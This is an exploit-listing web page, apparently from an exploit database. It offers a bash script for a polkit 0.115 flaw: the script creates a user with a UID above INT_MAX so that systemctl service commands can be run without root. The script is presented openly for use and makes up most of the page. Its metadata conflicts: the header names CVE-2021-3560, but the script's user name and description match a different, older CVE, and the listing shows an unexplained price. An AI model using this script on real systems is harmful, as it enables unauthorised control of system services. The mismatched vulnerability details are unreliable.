Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-3560 | CWE-269 | $80,000 | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
unknown | High | Local | 2020-05-04 |
#################################################################### # Exploit Title : PolicyKit (aka polkit) 0.115 INT_MAX #Author : MSS Team #Tested On : Linux #################################################################### #A flaw was found in PolicyKit (aka polkit) 0.115 that allows a user with a uid greater than INT_MAX to successfully execute any systemctl #command. #This issue affects the versions of polkit as shipped with Red Hat Enterprise Linux 6 and 7. #Red Hat Enterprise Linux 6 is now in Maintenance Support 2 Phase of the support and maintenance life cycle. #You can use this simple code then you can start,stop,restart,ETC without root permissions #!/bin/bash if [[ $EUID -ne 0 ]]; then echo "You must be a root user" 2>&1 exit 1 else groupadd -g 4000000000 cve201819788 useradd -m -c "User With High UID" -u 4000000000 -g 4000000000 -s /bin/bash cve201819788 id cve201819788 su cve201819788 - fi
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.